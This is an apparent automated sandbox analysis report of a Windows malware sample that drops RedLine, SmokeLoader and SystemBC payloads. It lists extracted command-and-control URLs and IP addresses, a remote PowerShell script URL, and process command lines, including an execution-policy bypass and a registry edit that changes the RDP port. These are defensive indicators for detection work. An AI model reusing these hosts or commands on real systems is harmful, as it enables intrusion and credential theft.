Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 11:59
Static task
static1
Behavioral task
behavioral1
Sample
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
Resource
win10-en-20211208
General
-
Target
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe
-
Size
299KB
-
MD5
a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
-
SHA1
e5d892d8c416d2768f12e7f45c8588a0c98f5987
-
SHA256
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
-
SHA512
041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Extracted
systembc
185.209.30.180:4001
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/808-122-0x0000000000C60000-0x0000000000CC8000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\2B53.exe family_redline C:\Users\Admin\AppData\Local\Temp\2B53.exe family_redline behavioral1/memory/1724-153-0x0000000000AC0000-0x0000000000B2C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 93 1752 powershell.exe 95 1752 powershell.exe 96 1752 powershell.exe 97 1752 powershell.exe 99 1752 powershell.exe 101 1752 powershell.exe 103 1752 powershell.exe 105 1752 powershell.exe 107 1752 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
2556.exe2B53.exe3372.exe40F0.exeauuewje40F0.exe5BCC.exepid process 808 2556.exe 3976 2B53.exe 1724 3372.exe 1308 40F0.exe 2368 auuewje 3960 40F0.exe 2980 5BCC.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3040 -
Loads dropped DLL 2 IoCs
Processes:
pid process 3136 3136 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
2556.exe3372.exepid process 808 2556.exe 1724 3372.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
40F0.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\Tasks\wow64.job 40F0.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_t03iaan0.hjn.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_t4ztxclk.fgt.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF44.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF55.tmp powershell.exe File opened for modification C:\Windows\Tasks\wow64.job 40F0.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF04.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF34.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICF66.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exeauuewjedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI auuewje Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI auuewje Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI auuewje -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exepid process 3504 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe 3504 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 3040 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3040 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exeauuewjepid process 3504 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe 2368 auuewje -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
2556.exe3372.exe2B53.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeDebugPrivilege 808 2556.exe Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeDebugPrivilege 1724 3372.exe Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeDebugPrivilege 3976 2B53.exe Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeShutdownPrivilege 3040 Token: SeCreatePagefilePrivilege 3040 Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeIncreaseQuotaPrivilege 1064 powershell.exe Token: SeSecurityPrivilege 1064 powershell.exe Token: SeTakeOwnershipPrivilege 1064 powershell.exe Token: SeLoadDriverPrivilege 1064 powershell.exe Token: SeSystemProfilePrivilege 1064 powershell.exe Token: SeSystemtimePrivilege 1064 powershell.exe Token: SeProfSingleProcessPrivilege 1064 powershell.exe Token: SeIncBasePriorityPrivilege 1064 powershell.exe Token: SeCreatePagefilePrivilege 1064 powershell.exe Token: SeBackupPrivilege 1064 powershell.exe Token: SeRestorePrivilege 1064 powershell.exe Token: SeShutdownPrivilege 1064 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeSystemEnvironmentPrivilege 1064 powershell.exe Token: SeRemoteShutdownPrivilege 1064 powershell.exe Token: SeUndockPrivilege 1064 powershell.exe Token: SeManageVolumePrivilege 1064 powershell.exe Token: 33 1064 powershell.exe Token: 34 1064 powershell.exe Token: 35 1064 powershell.exe Token: 36 1064 powershell.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeIncreaseQuotaPrivilege 2996 powershell.exe Token: SeSecurityPrivilege 2996 powershell.exe Token: SeTakeOwnershipPrivilege 2996 powershell.exe Token: SeLoadDriverPrivilege 2996 powershell.exe Token: SeSystemProfilePrivilege 2996 powershell.exe Token: SeSystemtimePrivilege 2996 powershell.exe Token: SeProfSingleProcessPrivilege 2996 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3040 3040 -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid process 3040 3040 3040 3040 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5BCC.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3040 wrote to memory of 808 3040 2556.exe PID 3040 wrote to memory of 808 3040 2556.exe PID 3040 wrote to memory of 808 3040 2556.exe PID 3040 wrote to memory of 3976 3040 2B53.exe PID 3040 wrote to memory of 3976 3040 2B53.exe PID 3040 wrote to memory of 3976 3040 2B53.exe PID 3040 wrote to memory of 1724 3040 3372.exe PID 3040 wrote to memory of 1724 3040 3372.exe PID 3040 wrote to memory of 1724 3040 3372.exe PID 3040 wrote to memory of 1308 3040 40F0.exe PID 3040 wrote to memory of 1308 3040 40F0.exe PID 3040 wrote to memory of 1308 3040 40F0.exe PID 3040 wrote to memory of 2980 3040 5BCC.exe PID 3040 wrote to memory of 2980 3040 5BCC.exe PID 2980 wrote to memory of 2108 2980 5BCC.exe powershell.exe PID 2980 wrote to memory of 2108 2980 5BCC.exe powershell.exe PID 2108 wrote to memory of 3848 2108 powershell.exe csc.exe PID 2108 wrote to memory of 3848 2108 powershell.exe csc.exe PID 3848 wrote to memory of 3704 3848 csc.exe cvtres.exe PID 3848 wrote to memory of 3704 3848 csc.exe cvtres.exe PID 2108 wrote to memory of 2820 2108 powershell.exe csc.exe PID 2108 wrote to memory of 2820 2108 powershell.exe csc.exe PID 2820 wrote to memory of 1736 2820 csc.exe cvtres.exe PID 2820 wrote to memory of 1736 2820 csc.exe cvtres.exe PID 2108 wrote to memory of 1064 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 1064 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 2996 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 2996 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 1300 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 1300 2108 powershell.exe powershell.exe PID 2108 wrote to memory of 3160 2108 powershell.exe reg.exe PID 2108 wrote to memory of 3160 2108 powershell.exe reg.exe PID 2108 wrote to memory of 356 2108 powershell.exe reg.exe PID 2108 wrote to memory of 356 2108 powershell.exe reg.exe PID 2108 wrote to memory of 1352 2108 powershell.exe reg.exe PID 2108 wrote to memory of 1352 2108 powershell.exe reg.exe PID 2108 wrote to memory of 3844 2108 powershell.exe net.exe PID 2108 wrote to memory of 3844 2108 powershell.exe net.exe PID 3844 wrote to memory of 2708 3844 net.exe net1.exe PID 3844 wrote to memory of 2708 3844 net.exe net1.exe PID 2108 wrote to memory of 3704 2108 powershell.exe cmd.exe PID 2108 wrote to memory of 3704 2108 powershell.exe cmd.exe PID 3704 wrote to memory of 3232 3704 cmd.exe cmd.exe PID 3704 wrote to memory of 3232 3704 cmd.exe cmd.exe PID 3232 wrote to memory of 2472 3232 cmd.exe net.exe PID 3232 wrote to memory of 2472 3232 cmd.exe net.exe PID 2472 wrote to memory of 3612 2472 net.exe net1.exe PID 2472 wrote to memory of 3612 2472 net.exe net1.exe PID 2108 wrote to memory of 3608 2108 powershell.exe cmd.exe PID 2108 wrote to memory of 3608 2108 powershell.exe cmd.exe PID 3608 wrote to memory of 3848 3608 cmd.exe cmd.exe PID 3608 wrote to memory of 3848 3608 cmd.exe cmd.exe PID 3848 wrote to memory of 1684 3848 cmd.exe net.exe PID 3848 wrote to memory of 1684 3848 cmd.exe net.exe PID 1684 wrote to memory of 3972 1684 net.exe net1.exe PID 1684 wrote to memory of 3972 1684 net.exe net1.exe PID 2880 wrote to memory of 392 2880 cmd.exe net.exe PID 2880 wrote to memory of 392 2880 cmd.exe net.exe PID 392 wrote to memory of 1156 392 net.exe net1.exe PID 392 wrote to memory of 1156 392 net.exe net1.exe PID 1296 wrote to memory of 1320 1296 cmd.exe net.exe PID 1296 wrote to memory of 1320 1296 cmd.exe net.exe PID 1320 wrote to memory of 3852 1320 net.exe net1.exe PID 1320 wrote to memory of 3852 1320 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe"C:\Users\Admin\AppData\Local\Temp\74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2556.exeC:\Users\Admin\AppData\Local\Temp\2556.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2B53.exeC:\Users\Admin\AppData\Local\Temp\2B53.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3372.exeC:\Users\Admin\AppData\Local\Temp\3372.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeC:\Users\Admin\AppData\Local\Temp\40F0.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\auuewjeC:\Users\Admin\AppData\Roaming\auuewje1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\40F0.exeC:\Users\Admin\AppData\Local\Temp\40F0.exe start1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5BCC.exeC:\Users\Admin\AppData\Local\Temp\5BCC.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlytvvhu\hlytvvhu.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8818.tmp" "c:\Users\Admin\AppData\Local\Temp\hlytvvhu\CSCD325231E0BC419885828D16AAB4B2A2.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bdrv1q4i\bdrv1q4i.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9084.tmp" "c:\Users\Admin\AppData\Local\Temp\bdrv1q4i\CSC274793B17BA34147AA1A9E992D21413.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
